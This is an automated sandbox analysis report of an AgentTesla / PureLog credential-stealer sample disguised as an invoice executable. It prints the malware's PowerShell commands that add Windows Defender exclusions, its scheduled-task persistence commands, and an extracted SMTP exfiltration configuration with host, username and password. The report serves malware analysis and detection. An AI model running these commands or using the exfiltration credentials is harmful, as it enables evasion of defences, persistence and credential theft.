Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TT Invoice copy.exe

Overview

General Information

Sample name:TT Invoice copy.exe
Analysis ID:1426712
MD5:bf78f7d9bb46ae5314ec7b6d9e651b23
SHA1:78424f07e9a07b41322a2a91fa71a7db42a8dfd6
SHA256:76023ee62db39b5f6e730247c677494d69ead6467e2d2d313ba0f7a87f9ce977
Tags:exeFormbook
Infos:

Detection

AgentTesla, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • TT Invoice copy.exe (PID: 6716 cmdline: "C:\Users\user\Desktop\TT Invoice copy.exe" MD5: BF78F7D9BB46AE5314EC7B6D9E651B23)
    • powershell.exe (PID: 7252 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT Invoice copy.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7300 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pUAQmWA.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7688 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7352 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pUAQmWA" /XML "C:\Users\user\AppData\Local\Temp\tmp3165.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • conhost.exe (PID: 7220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • TT Invoice copy.exe (PID: 7508 cmdline: "C:\Users\user\Desktop\TT Invoice copy.exe" MD5: BF78F7D9BB46AE5314EC7B6D9E651B23)
  • pUAQmWA.exe (PID: 7612 cmdline: C:\Users\user\AppData\Roaming\pUAQmWA.exe MD5: BF78F7D9BB46AE5314EC7B6D9E651B23)
    • schtasks.exe (PID: 7848 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pUAQmWA" /XML "C:\Users\user\AppData\Local\Temp\tmp3E66.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • pUAQmWA.exe (PID: 7896 cmdline: "C:\Users\user\AppData\Roaming\pUAQmWA.exe" MD5: BF78F7D9BB46AE5314EC7B6D9E651B23)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "us2.smtp.mailhostbox.com", "Username": "rajesh.nair@grupocatqla.com", "Password": "PMOYQrU0"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
TT Invoice copy.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\pUAQmWA.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000008.00000002.2889363476.0000000002CB4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000008.00000002.2889363476.0000000002CB4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          0000000D.00000002.2888895822.0000000003301000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0000000D.00000002.2888895822.0000000003301000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              0000000D.00000002.2888895822.0000000003327000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                Click to see the 19 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                13.2.pUAQmWA.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  13.2.pUAQmWA.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    13.2.pUAQmWA.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      13.2.pUAQmWA.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                      • 0x33f61:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                      • 0x33fd3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                      • 0x3405d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                      • 0x340ef:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                      • 0x34159:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                      • 0x341cb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                      • 0x34261:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                      • 0x342f1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                      0.2.TT Invoice copy.exe.3a4c0e0.11.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                        Click to see the 28 entries

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT Invoice copy.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT Invoice copy.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TT Invoice copy.exe", ParentImage: C:\Users\user\Desktop\TT Invoice copy.exe, ParentProcessId: 6716, ParentProcessName: TT Invoice copy.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT Invoice copy.exe", ProcessId: 7252, ProcessName: powershell.exe
                        Sigma detected: Powershell Defender Exclusion
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT Invoice copy.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT Invoice copy.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TT Invoice copy.exe", ParentImage: C:\Users\user\Desktop\TT Invoice copy.exe, ParentProcessId: 6716, ParentProcessName: TT Invoice copy.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT Invoice copy.exe", ProcessId: 7252, ProcessName: powershell.exe
                        Sigma detected: Suspicious Add Scheduled Task Parent
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pUAQmWA" /XML "C:\Users\user\AppData\Local\Temp\tmp3E66.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pUAQmWA" /XML "C:\Users\user\AppData\Local\Temp\tmp3E66.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\pUAQmWA.exe, ParentImage: C:\Users\user\AppData\Roaming\pUAQmWA.exe, ParentProcessId: 7612, ParentProcessName: pUAQmWA.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pUAQmWA" /XML "C:\Users\user\AppData\Local\Temp\tmp3E66.tmp", ProcessId: 7848, ProcessName: schtasks.exe
                        Sigma detected: Suspicious Outbound SMTP Connections
                        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 208.91.198.143, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\TT Invoice copy.exe, Initiated: true, ProcessId: 7508, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49734
                        Sigma detected: Suspicious Schtasks From Env Var Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pUAQmWA" /XML "C:\Users\user\AppData\Local\Temp\tmp3165.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pUAQmWA" /XML "C:\Users\user\AppData\Local\Temp\tmp3165.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\TT Invoice copy.exe", ParentImage: C:\Users\user\Desktop\TT Invoice copy.exe, ParentProcessId: 6716, ParentProcessName: TT Invoice copy.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pUAQmWA" /XML "C:\Users\user\AppData\Local\Temp\tmp3165.tmp", ProcessId: 7352, ProcessName: schtasks.exe
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT Invoice copy.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT Invoice copy.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TT Invoice copy.exe", ParentImage: C:\Users\user\Desktop\TT Invoice copy.exe, ParentProcessId: 6716, ParentProcessName: TT Invoice copy.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT Invoice copy.exe", ProcessId: 7252, ProcessName: powershell.exe

                        Persistence and Installation Behavior

                        barindex
                        Sigma detected: Scheduled temp file as task from temp location
                        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pUAQmWA" /XML "C:\Users\user\AppData\Local\Temp\tmp3165.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pUAQmWA" /XML "C:\Users\user\AppData\Local\Temp\tmp3165.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\TT Invoice copy.exe", ParentImage: C:\Users\user\Desktop\TT Invoice copy.exe, ParentProcessId: 6716, ParentProcessName: TT Invoice copy.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pUAQmWA" /XML "C:\Users\user\AppData\Local\Temp\tmp3165.tmp", ProcessId: 7352, ProcessName: schtasks.exe

                        Snort Signatures

                        No Snort rule has matched

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus / Scanner detection for submitted sample
                        Source: TT Invoice copy.exeAvira: detected
                        Antivirus detection for dropped file
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeAvira: detection malicious, Label: TR/AD.GenSteal.iagga
                        Found malware configuration
                        Source: 0.2.TT Invoice copy.exe.3a10cc0.10.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "us2.smtp.mailhostbox.com", "Username": "rajesh.nair@grupocatqla.com", "Password": "PMOYQrU0"}
                        Multi AV Scanner detection for dropped file
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeReversingLabs: Detection: 47%
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeVirustotal: Detection: 51%Perma Link
                        Multi AV Scanner detection for submitted file
                        Source: TT Invoice copy.exeReversingLabs: Detection: 47%
                        Source: TT Invoice copy.exeVirustotal: Detection: 51%Perma Link
                        Machine Learning detection for dropped file
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeJoe Sandbox ML: detected
                        Machine Learning detection for sample
                        Source: TT Invoice copy.exeJoe Sandbox ML: detected
                        Source: TT Invoice copy.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                        Source: TT Invoice copy.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeCode function: 4x nop then jmp 00E353D9h0_2_00E34927
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeCode function: 4x nop then jmp 04504661h9_2_04503BAF

                        Networking

                        barindex
                        Yara detected Generic Downloader
                        Source: Yara matchFile source: 13.2.pUAQmWA.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.pUAQmWA.exe.370d0a8.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.pUAQmWA.exe.36d1c88.12.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.TT Invoice copy.exe.3a10cc0.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.TT Invoice copy.exe.3a4c0e0.11.raw.unpack, type: UNPACKEDPE
                        Source: global trafficTCP traffic: 192.168.2.4:49734 -> 208.91.198.143:587
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: Joe Sandbox ViewIP Address: 208.91.198.143 208.91.198.143
                        Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                        Source: unknownDNS query: name: ip-api.com
                        Source: global trafficTCP traffic: 192.168.2.4:49734 -> 208.91.198.143:587
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: unknownDNS traffic detected: queries for: ip-api.com
                        Source: TT Invoice copy.exe, 00000008.00000002.2885721948.0000000000E9F000.00000004.00000020.00020000.00000000.sdmp, TT Invoice copy.exe, 00000008.00000002.2886767446.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp, TT Invoice copy.exe, 00000008.00000002.2898221371.0000000006524000.00000004.00000020.00020000.00000000.sdmp, TT Invoice copy.exe, 00000008.00000002.2889363476.0000000002CDF000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2888895822.000000000332F000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2885567995.0000000001406000.00000004.00000020.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2885567995.0000000001432000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                        Source: TT Invoice copy.exe, 00000008.00000002.2885721948.0000000000E9F000.00000004.00000020.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2885567995.0000000001432000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                        Source: TT Invoice copy.exe, 00000008.00000002.2885721948.0000000000E9F000.00000004.00000020.00020000.00000000.sdmp, TT Invoice copy.exe, 00000008.00000002.2885721948.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, TT Invoice copy.exe, 00000008.00000002.2898221371.0000000006524000.00000004.00000020.00020000.00000000.sdmp, TT Invoice copy.exe, 00000008.00000002.2889363476.0000000002CDF000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2888895822.000000000332F000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2885567995.0000000001406000.00000004.00000020.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2885567995.0000000001432000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
                        Source: TT Invoice copy.exe, 00000008.00000002.2889363476.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2888895822.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                        Source: TT Invoice copy.exe, 00000000.00000002.1682284235.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, TT Invoice copy.exe, 00000008.00000002.2889363476.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 00000009.00000002.1721632586.00000000036D1000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2888895822.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2884744372.0000000000431000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                        Source: TT Invoice copy.exe, 00000008.00000002.2885721948.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingi
                        Source: TT Invoice copy.exe, 00000008.00000002.2885721948.0000000000E9F000.00000004.00000020.00020000.00000000.sdmp, TT Invoice copy.exe, 00000008.00000002.2886767446.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp, TT Invoice copy.exe, 00000008.00000002.2898221371.0000000006524000.00000004.00000020.00020000.00000000.sdmp, TT Invoice copy.exe, 00000008.00000002.2889363476.0000000002CDF000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2888895822.000000000332F000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2885567995.0000000001406000.00000004.00000020.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2885567995.0000000001432000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                        Source: TT Invoice copy.exe, 00000008.00000002.2885721948.0000000000E9F000.00000004.00000020.00020000.00000000.sdmp, TT Invoice copy.exe, 00000008.00000002.2885721948.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, TT Invoice copy.exe, 00000008.00000002.2898221371.0000000006524000.00000004.00000020.00020000.00000000.sdmp, TT Invoice copy.exe, 00000008.00000002.2889363476.0000000002CDF000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2888895822.000000000332F000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2885567995.0000000001406000.00000004.00000020.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2885567995.0000000001432000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0A
                        Source: TT Invoice copy.exe, 00000000.00000002.1681301766.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, TT Invoice copy.exe, 00000008.00000002.2889363476.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 00000009.00000002.1714095996.00000000024E8000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2888895822.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: TT Invoice copy.exe, 00000008.00000002.2889363476.0000000002CDF000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2888895822.0000000003327000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
                        Source: TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                        Source: TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                        Source: TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                        Source: TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                        Source: TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                        Source: TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                        Source: TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                        Source: TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                        Source: TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                        Source: TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                        Source: TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                        Source: TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                        Source: TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                        Source: TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                        Source: TT Invoice copy.exe, 00000000.00000002.1685058068.0000000005830000.00000004.00000020.00020000.00000000.sdmp, TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                        Source: TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                        Source: TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                        Source: TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                        Source: TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                        Source: TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                        Source: TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                        Source: TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                        Source: TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                        Source: TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                        Source: TT Invoice copy.exe, 00000000.00000002.1682284235.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 00000009.00000002.1721632586.00000000036D1000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2884744372.0000000000431000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
